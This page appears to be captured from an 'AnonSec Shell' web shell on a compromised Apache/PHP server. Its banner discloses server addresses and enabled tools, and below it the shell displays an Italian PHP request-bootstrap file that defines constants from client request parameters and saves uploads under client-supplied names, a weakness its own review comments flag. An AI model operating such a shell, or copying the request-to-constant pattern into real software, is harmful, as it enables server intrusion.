AnonSec Shell
Server IP : 52.223.31.75  /  Your IP : 172.31.32.98   [ Reverse IP ]
Web Server : Apache/2.4.66 () OpenSSL/1.0.2k-fips PHP/7.4.33
System : Linux ip-172-31-14-81.eu-central-1.compute.internal 4.14.281-212.502.amzn2.x86_64 #1 SMP Thu May 26 09:52:17 UTC 2022 x86_64
User : apache ( 48)
PHP Version : 7.4.33
Disable Function : NONE
Domains : 4 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/sapere/app/


Current File : /var/www/sapere/app/url.php
<?php

// var_dump($_FILES);
// die;
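// ---------------------------------------------------------------------------
// Request bootstrap: turns the incoming request (JSON body, query string or
// multipart POST) into PHP constants and, where files are sent, stores them
// on disk. Every input handled here is client-controlled.
//
// SECURITY NOTE(review): constant names are taken from the request. A name
// that is already defined is left untouched, but any constant the application
// defines *after* this file runs can be pre-empted by a request parameter of
// the same name. Prefer an explicit allow-list of expected parameter names;
// the expected set is not visible from this file.
// ---------------------------------------------------------------------------

/**
 * Send the JSON error envelope {"message": ..., "status": false} and stop.
 */
$respondWithError = static function (string $message): void {
    header('Content-Type: application/json');
    $data = array(
        "message" => $message,
        "status" => false,
    );
    print( json_encode($data) );
    die();
};

/**
 * Convert a php.ini size setting ("8M", "512K", "1G" or a plain byte count)
 * to bytes. The previous "(int) value * 1024 * 1024" was only right for "M".
 */
$iniBytes = static function (string $setting): int {
    $raw = trim((string) ini_get($setting));
    $bytes = (int) $raw;
    switch (strtolower((string) substr($raw, -1))) {
        case 'g':
            $bytes *= 1024;
            // no break
        case 'm':
            $bytes *= 1024;
            // no break
        case 'k':
            $bytes *= 1024;
    }
    return $bytes;
};

/**
 * True when $size is larger than the given ini limit. A non-positive limit
 * is treated as "no limit" instead of rejecting every request.
 */
$exceedsIniLimit = static function ($size, string $setting) use ($iniBytes): bool {
    $limit = $iniBytes($setting);
    return $limit > 0 && (int) $size > $limit;
};

/**
 * Define a request parameter as an upper-cased constant. Empty names and
 * names that are already defined are skipped, so existing constants are
 * never shadowed and no "already defined" notice is emitted.
 */
$defineParam = static function ($name, $value): void {
    $constant = strtoupper((string) $name);
    if ($constant === '' || defined($constant)) {
        return;
    }
    define($constant, $value);
};

// Reject oversized requests early, before looking at any parameter.
if (isset($_SERVER["CONTENT_LENGTH"])) {
    $contentLength = $_SERVER["CONTENT_LENGTH"];
    if ($exceedsIniLimit($contentLength, 'post_max_size') || $exceedsIniLimit($contentLength, 'upload_max_filesize')) {
        $respondWithError("I files caricati superano la dimensione massima di upload del singolo file di ".ini_get('upload_max_filesize')." o quella supportata dal sistema ".ini_get('post_max_size').". Prova a caricare un numero minore di file, puoi caricare al massimo ".ini_get('max_file_uploads')." files, nessun file caricato!");
    }
}

// $jsonRequest holds the whitespace-stripped, lower-cased Content-Type when the
// header is present, otherwise the raw header array (which never equals the
// string compared below).
// NOTE(review): the lookup is case-sensitive and a value carrying parameters
// ("application/json; charset=utf-8") does not match — confirm this is intended.
$jsonRequest = getallheaders();

if ( array_key_exists('Content-Type', $jsonRequest) ) {
    $jsonRequest = strtolower(preg_replace('/\s+/', '', $jsonRequest["Content-Type"]));
}

if ($jsonRequest == "application/json") {

    // A body that does not decode to a JSON object yields no parameters.
    $json = json_decode(file_get_contents('php://input'));
    $objs = is_object($json) ? get_object_vars($json) : array();
    $files = array();

    // Declared-type token => server-chosen file name. The first match wins, so
    // "docx"/"xlsx" are listed before "doc"/"xls"; in the old order those two
    // branches were unreachable. Video types are intentionally not handled.
    // The stored name and extension never come from the client.
    $tmpDir = SITEROOT_DIR.'/www/api/tmp/';
    $targetByPattern = array(
        '/jpeg/i' => time() . '_' .'temp.jpg',
        '/png/i'  => time() . '_' .'temp.png',
        '/gif/i'  => time() . '_' .'temp.gif',
        '/csv/i'  => 'file.csv',
        '/pdf/i'  => time().'-pdf.pdf',
        '/txt/i'  => time().'-txt.txt',
        '/docx/i' => time().'-docx.docx',
        '/doc/i'  => time().'-doc.doc',
        '/xlsx/i' => time().'-xlsx.xlsx',
        '/xls/i'  => time().'-xls.xls',
    );

    foreach ($objs as $params => $data) {

        if ($params === "files") {
            // Expected shape: "data:<type>;base64,<payload>". Anything else
            // (non-string value, missing separators) ends up as -1 below.
            $uploaddir = null;
            $segments = is_string($data) ? explode(';', $data) : array();
            $type = isset($segments[0]) ? $segments[0] : '';
            $encoded = isset($segments[1]) ? explode(',', $segments[1]) : array();
            $data = base64_decode(isset($encoded[1]) ? $encoded[1] : '');

            foreach ($targetByPattern as $pattern => $fileName) {
                if (preg_match($pattern, $type)) {
                    $uploaddir = $tmpDir . $fileName;
                    break;
                }
            }

            // -1 marks "nothing stored": unsupported type or failed write.
            if ($uploaddir === null || file_put_contents($uploaddir, $data) === false) {
                $uploaddir = -1;
            }

            $files[] = $uploaddir;
            continue;
        }

        // Arrays are stored serialized; every other value is stored as decoded.
        $defineParam($params, is_array($data) ? serialize($data) : $data);
    }

} else if (!empty($_SERVER['QUERY_STRING'])) {

    // Raw query string: "key=value" pairs split on "&". Values are used as
    // sent (no URL decoding). File uploads are not handled on this path.
    $params = explode("&", $_SERVER['QUERY_STRING']);

    foreach ($params as $param) {
        $pieces = explode("=", $param);
        // Name is the text before the first "=", value the text after the last.
        $defineParam(reset($pieces), end($pieces));
    }

} else if ($_POST) {
    if ($_FILES) {
        $error = false;
        $files = array();
        $uploaddir = SITEROOT_DIR.'/uploads/';

        // Normalise to the multi-file layout (name[], type[], ...) so a
        // missing or single-file "files" field cannot break the loops below.
        $file = isset($_FILES['files']) ? $_FILES['files'] : array();
        foreach (array('name', 'type', 'tmp_name', 'error', 'size') as $field) {
            $file[$field] = isset($file[$field]) ? (array) $file[$field] : array();
        }
        $fileCount = count($file['name']);

        if ((int)ini_get('max_file_uploads') < $fileCount) {
            $respondWithError("Il numero massimo di file caricabili: ".ini_get('max_file_uploads').". Prova a caricare un numero minore di file in comtemporanea, nessun file caricato!");
        }

        // The declared MIME type and the file name are both sent by the client.
        // Because the file is stored under its own name, the extension decides
        // how the web server treats it, so it is checked against an allow-list
        // that mirrors the media/document categories of the declared-type test.
        // The uploads directory should additionally be configured so that
        // nothing inside it is executed as a script.
        $allowedExtensions = array(
            'jpg', 'jpeg', 'png', 'gif',
            'mp4', 'm4a', 'm4v', 'mov', 'wmv', 'mkv', 'webm', 'avi', 'mpeg', 'mpg', 'mp3',
            'pdf', 'doc', 'docx', 'xls', 'xlsx', 'zip',
        );

        // Validate every file before storing any, so a rejection leaves
        // nothing behind.
        $totale_files_size = 0;
        for ($i = 0; $i < $fileCount; $i++) {
            $name = (string) $file['name'][$i];
            $size = isset($file['size'][$i]) ? $file['size'][$i] : 0;
            $declaredType = isset($file['type'][$i]) ? (string) $file['type'][$i] : '';

            if ($exceedsIniLimit($size, 'post_max_size') || $exceedsIniLimit($size, 'upload_max_filesize')) {
                $respondWithError("Il file ". $name ." supera la dimensione massima di upload del singolo file di ".ini_get('upload_max_filesize').". Nessun file caricato!");
            }
            $totale_files_size += $size;

            $extension = strtolower(pathinfo(basename($name), PATHINFO_EXTENSION));
            $typeAccepted = preg_match("/jpeg|png|gif|mp4|mp4a|mp4s|mp4v|mov|mwm|mkv|webm|avi|mpeg|mp3|pdf|doc|docx|zip|xls|xlsx/i", $declaredType);
            if (!$typeAccepted || !in_array($extension, $allowedExtensions, true)) {
                $respondWithError("File ". $name ." non supportato! Nessun file caricato!");
            }
        }
        if ($exceedsIniLimit($totale_files_size, 'post_max_size')) {
            $respondWithError("La somma della dimensione dei tuoi file supera quella supportata dal sistema ".ini_get('post_max_size').". Prova a caricare un numero minore di file in comtemporanea, nessun file caricato!");
        }

        $error_files = array();
        for ($i = 0; $i < $fileCount; $i++) {
            // Build the destination once, so the recorded path is exactly the
            // path the file was written to.
            $target = $uploaddir . basename((string) $file['name'][$i]);
            $source = isset($file['tmp_name'][$i]) ? (string) $file['tmp_name'][$i] : '';
            if (move_uploaded_file($source, $target)) {
                $files[] = $target;
            } else {
                $error_files[] = $file['name'][$i];
            }
        }
        if (count($error_files) > 0) {
            $respondWithError("I seguenti file non sono stati caricati: ". implode(", ", $error_files));
        }
    }

    // FILES is null when the request carried no uploads.
    define("FILES", $files ?? null);

    $params = $_POST;
    foreach ($params as $k => $v) {
        $defineParam($k, $v);
    }

} else {

    $respondWithError("Nessun Parametro Inviato!");
}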


?>
